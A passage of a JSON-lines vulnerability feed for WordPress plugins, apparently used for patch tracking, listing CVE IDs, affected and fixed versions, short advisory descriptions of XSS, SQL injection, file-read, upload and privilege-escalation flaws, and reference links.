version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-store-kit\\\/tags\\\/2.3.6\\\/admin\\\/admin-notice.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-store-kit\\\/tags\\\/2.3.6\\\/admin\\\/admin-notice.php#L43\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3255125\\\/ultimate-store-kit\\\/trunk\\\/admin\\\/admin-notice.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3255125\\\/ultimate-store-kit\\\/trunk\\\/admin\\\/admin-notice.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3283438\\\/ultimate-store-kit\\\/trunk\\\/admin\\\/admin-notice.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3283438\\\/ultimate-store-kit\\\/trunk\\\/admin\\\/admin-notice.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a48634d7-30c9-4124-87dd-93a303a969eb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a48634d7-30c9-4124-87dd-93a303a969eb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12334","slug":"wc-affiliate","versionImpact":"2.4","versionEndExcluding":"2.5","description":"The WC Affiliate \u2013 A Complete WooCommerce Affiliate Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via any parameter in all versions up to, and including, 2.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224312\\\/wc-affiliate\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224312\\\/wc-affiliate\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efca1ee2-2038-440e-941c-22533b4d833b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efca1ee2-2038-440e-941c-22533b4d833b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3681","slug":"interactive-world-maps","versionImpact":"2.4.14","versionEndExcluding":"2.5","description":"The Interactive World Maps plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search (s) parameter in all versions up to, and including, 2.4.14 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9295b82-27c1-4f35-b40c-1ac40ebe5d5e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9295b82-27c1-4f35-b40c-1ac40ebe5d5e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/interactive-world-maps\\\/2874264\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/interactive-world-maps\\\/2874264\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5000","slug":"horizontal-scrolling-announcements","versionImpact":"2.4","versionEndExcluding":"2.5","description":"The Horizontal scrolling announcements plugin for WordPress is vulnerable to SQL Injection via the plugin's 'hsas-shortcode' shortcode in versions up to, and including, 2.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with contributor-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/327e706d-2d6c-4204-a531-281f2e2dbcf0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/327e706d-2d6c-4204-a531-281f2e2dbcf0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/horizontal-scrolling-announcements\\\/trunk\\\/query\\\/db_content.php?rev=2827116#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/horizontal-scrolling-announcements\\\/trunk\\\/query\\\/db_content.php?rev=2827116#L44\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/horizontal-scrolling-announcements\\\/trunk\\\/query\\\/db_content.php?rev=2973422#L56\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/horizontal-scrolling-announcements\\\/trunk\\\/query\\\/db_content.php?rev=2973422#L56\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9892","slug":"add-widget-after-content","versionImpact":"2.4.6","versionEndExcluding":"2.5","description":"The Add Widget After Content plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.4.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e02472a8-5b88-43ad-86f3-e890b49899ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e02472a8-5b88-43ad-86f3-e890b49899ad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-widget-after-content\\\/trunk\\\/add-widget-after-content-admin.php#L320\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-widget-after-content\\\/trunk\\\/add-widget-after-content-admin.php#L320\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8804","slug":"simple-embed-code","versionImpact":"2.4","versionEndExcluding":"2.5","description":"The Code Embed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's script embed functionality in all versions up to, and including, 2.4 due to insufficient restrictions on who can utilize the functionality. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab4149e1-8378-4007-bbf2-1ac3c479e7ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab4149e1-8378-4007-bbf2-1ac3c479e7ea?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3162219%40simple-embed-code&new=3162219%40simple-embed-code&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3162219%40simple-embed-code&new=3162219%40simple-embed-code&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3103","slug":"elementor_widget_clever_radio_player","versionImpact":"2.4","versionEndExcluding":"2.5","description":"The CLEVER - HTML5 Radio Player With History - Shoutcast and Icecast - Elementor Widget Addon plugin for WordPress is vulnerable to arbitrary file read due to insufficient file path validation in the 'history.php' file in all versions up to, and including, 2.4. This makes it possible for unauthenticated attackers to read arbitrary files on the affected site's server, which may contain sensitive information including database credentials. The vulnerability was partially patched in version 2.4.","recommendation":"Update to version 2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/clever-html5-radio-player-with-history-shoutcast-and-icecast-elementor-widget-addon\\\/26708087#item-description__updates-release-log\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/clever-html5-radio-player-with-history-shoutcast-and-icecast-elementor-widget-addon\\\/26708087#item-description__updates-release-log\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0733261f-a2e1-4bd1-a57d-fdaaa8c904db?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0733261f-a2e1-4bd1-a57d-fdaaa8c904db?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-45067","slug":"wp-simple-html-sitemap","versionImpact":"2.4","versionEndExcluding":"2.5","description":"Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Ashish Ajani WordPress Simple HTML Sitemap plugin <=\u00a02.1 versions.","recommendation":"Update to version 2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-simple-html-sitemap\\\/wordpress-wordpress-simple-html-sitemap-plugin-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-simple-html-sitemap\\\/wordpress-wordpress-simple-html-sitemap-plugin-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0274","slug":"url-params","versionEndExcluding":"2.5","description":"The URL Params WordPress plugin before 2.5 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4f6197b6-6d4c-4986-b54c-453b17e94812\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4f6197b6-6d4c-4986-b54c-453b17e94812\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7573","slug":"relevanssi-live-ajax-search","versionImpact":"2.4","versionEndExcluding":"2.5","description":"The Relevanssi Live Ajax Search plugin for WordPress is vulnerable to argument injection in all versions up to, and including, 2.4. This is due to insufficient validation of input supplied via POST data in the 'search' function. This makes it possible for unauthenticated attackers to inject arbitrary arguments into a WP_Query query and potentially expose sensitive information such as attachments or private posts.","recommendation":"Update to version 2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbcb648a-4a3e-4645-bd62-4415b1cf6516?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbcb648a-4a3e-4645-bd62-4415b1cf6516?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3135074\\\/relevanssi-live-ajax-search\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3135074\\\/relevanssi-live-ajax-search\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1122","slug":"giveasap","versionEndExcluding":"2.45.1","description":"The Simple Giveaways WordPress plugin before 2.45.1 does not sanitise and escape some of its Giveaways options, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/71f5d630-2726-48c7-b9e5-7bebc786b561\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/71f5d630-2726-48c7-b9e5-7bebc786b561\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1121","slug":"giveasap","versionEndExcluding":"2.45.1","description":"The Simple Giveaways WordPress plugin before 2.45.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7ead9fb9-d81f-47c6-a1b4-21f29183cc15\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7ead9fb9-d81f-47c6-a1b4-21f29183cc15\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1120","slug":"giveasap","versionEndExcluding":"2.45.1","description":"The Simple Giveaways WordPress plugin before 2.45.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c2defd30-7e4c-4a28-8a68-282429061f3f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c2defd30-7e4c-4a28-8a68-282429061f3f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3961","slug":"convertkit","versionImpact":"2.4.9","versionEndExcluding":"2.4.9.1","description":"The ConvertKit \u2013 Email Newsletter, Email Marketing, Subscribers and Landing Pages plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the tag_subscriber function in all versions up to, and including, 2.4.9. This makes it possible for unauthenticated attackers to subscribe users to tags. Financial damages may occur to site owners if their API quota is exceeded.","recommendation":"Update to version 2.4.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79d828b8-aea2-4705-ae23-ac70133a6c3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79d828b8-aea2-4705-ae23-ac70133a6c3e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3104932%40convertkit%2Ftrunk&old=3085997%40convertkit%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3104932%40convertkit%2Ftrunk&old=3085997%40convertkit%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2790","slug":"ht-mega-for-elementor","versionImpact":"2.4.8","versionEndExcluding":"2.4.9","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Accordion widget in all versions up to, and including, 2.4.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52ba91f1-21a2-4d7c-8801-b5e72a00c37d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52ba91f1-21a2-4d7c-8801-b5e72a00c37d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3063395%40ht-mega-for-elementor&new=3063395%40ht-mega-for-elementor&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3063395%40ht-mega-for-elementor&new=3063395%40ht-mega-for-elementor&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6558","slug":"users-customers-import-export-for-wp-woocommerce","versionImpact":"2.4.8","versionEndExcluding":"2.4.9","description":"The Export and Import Users and Customers plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'upload_import_file' function in versions up to, and including, 2.4.8. This makes it possible for authenticated attackers with shop manager-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55b3e2dc-dc4f-408b-bbc6-da72ed5ad245?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55b3e2dc-dc4f-408b-bbc6-da72ed5ad245?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/tags\\\/2.4.7\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php#L124\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/tags\\\/2.4.7\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php#L124\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3008454\\\/users-customers-import-export-for-wp-woocommerce#file197\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3008454\\\/users-customers-import-export-for-wp-woocommerce#file197\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8420","slug":"dhvc-form","versionImpact":"2.4.7","versionEndExcluding":"2.4.8","description":"The DHVC Form plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 2.4.7. This is due to the plugin allowing a user to supply the 'role' field when registering. This makes it possible for unauthenticated attackers to register as an administrator on sites.","recommendation":"Update to version 2.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/dhvc-form-wordpress-form-for-visual-composer\\\/8326593\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/dhvc-form-wordpress-form-for-visual-composer\\\/8326593\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4d51a0c-c625-4732-b345-df02971fbffa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4d51a0c-c625-4732-b345-df02971fbffa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-24548","slug":"autoglot","versionImpact":"2.4.7","versionEndExcluding":"2.4.8","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Autoglot Autoglot \u2013 Automatic WordPress Translation allows Reflected XSS. This issue affects Autoglot \u2013 Automatic WordPress Translation: from n\/a through 2.4.7.","recommendation":"Update to version 2.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/autoglot\\\/vulnerability\\\/wordpress-autoglot-automatic-wordpress-translation-plugin-2-4-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/autoglot\\\/vulnerability\\\/wordpress-autoglot-automatic-wordpress-translation-plugin-2-4-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6723","slug":"ai-engine","versionImpact":"2.4.7","versionEndExcluding":"2.4.8","description":"The AI Engine WordPress plugin before 2.4.8 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by admin users when viewing chatbot discussions.","recommendation":"Update to version 2.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fbd2152e-0aa1-4b56-a6a3-2e6ec78e08a5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fbd2152e-0aa1-4b56-a6a3-2e6ec78e08a5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6843","slug":"easyjobs","versionImpact":"2.4.6","versionEndExcluding":"2.4.7","description":"The easy.jobs- Best Recruitment Plugin for Job Board Listing, Manager, Career Page for Elementor & Gutenberg WordPress plugin before 2.4.7 does not properly secure some of its AJAX actions, allowing any logged-in users to modify its settings.","recommendation":"Update to version 2.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/41508340-8caf-4dca-bd88-350b63b78ab0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/41508340-8caf-4dca-bd88-350b63b78ab0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12160","slug":"seraphinite-discount-for-woocommerce","versionImpact":"2.4.6","versionEndExcluding":"2.4.7","description":"The Seraphinite Bulk Discounts for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.4.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seraphinite-discount-for-woocommerce\\\/trunk\\\/Cmn\\\/Plugin.php#L1060\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seraphinite-discount-for-woocommerce\\\/trunk\\\/Cmn\\\/Plugin.php#L1060\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206551%40seraphinite-discount-for-woocommerce&new=3206551%40seraphinite-discount-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206551%40seraphinite-discount-for-woocommerce&new=3206551%40seraphinite-discount-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd748b6c-110a-46b6-a609-64d093dfc3e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd748b6c-110a-46b6-a609-64d093dfc3e5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3470","slug":"poll-wp","versionImpact":"2.4.6","versionEndExcluding":"2.4.7","description":"The TS Poll \u2013 Survey, Versus Poll, Image Poll, Video Poll plugin for WordPress is vulnerable to SQL Injection via the s parameter in all versions up to, and including, 2.4.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-wp\\\/tags\\\/2.4.6\\\/admin\\\/class-ts_poll_list.php#L27\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-wp\\\/tags\\\/2.4.6\\\/admin\\\/class-ts_poll_list.php#L27\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e2dab05-97ce-4f53-8069-2577c5c25b16?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e2dab05-97ce-4f53-8069-2577c5c25b16?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12921","slug":"ethereumico","versionImpact":"2.4.6","versionEndExcluding":"2.4.7","description":"The EthereumICO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ethereum-ico shortcode in all versions up to, and including, 2.4.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230122\\\/ethereumico\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230122\\\/ethereumico\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d964c99c-6ab6-453c-969f-66d5cd00dc8e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d964c99c-6ab6-453c-969f-66d5cd00dc8e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2085","slug":"ht-mega-for-elementor","versionImpact":"2.4.6","versionEndExcluding":"2.4.7","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'size' value in several widgets all versions up to, and including, 2.4.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f9c5bed-a399-43e2-be40-d669e90d3736?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f9c5bed-a399-43e2-be40-d669e90d3736?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048999\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_accordion.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048999\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_accordion.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2084","slug":"ht-mega-for-elementor","versionImpact":"2.4.6","versionEndExcluding":"2.4.7","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's lightbox widget in all versions up to, and including, 2.4.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e5417d3-c466-4caf-9fb6-26d6e2c06fe1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e5417d3-c466-4caf-9fb6-26d6e2c06fe1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048999\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048999\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0823","slug":"cookie-notice","versionEndExcluding":"2.4.7","description":"The Cookie Notice & Compliance for GDPR \/ CCPA WordPress plugin before 2.4.7 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/83f23a9f-9ace-47d2-a5f3-a4915129b16c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/83f23a9f-9ace-47d2-a5f3-a4915129b16c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
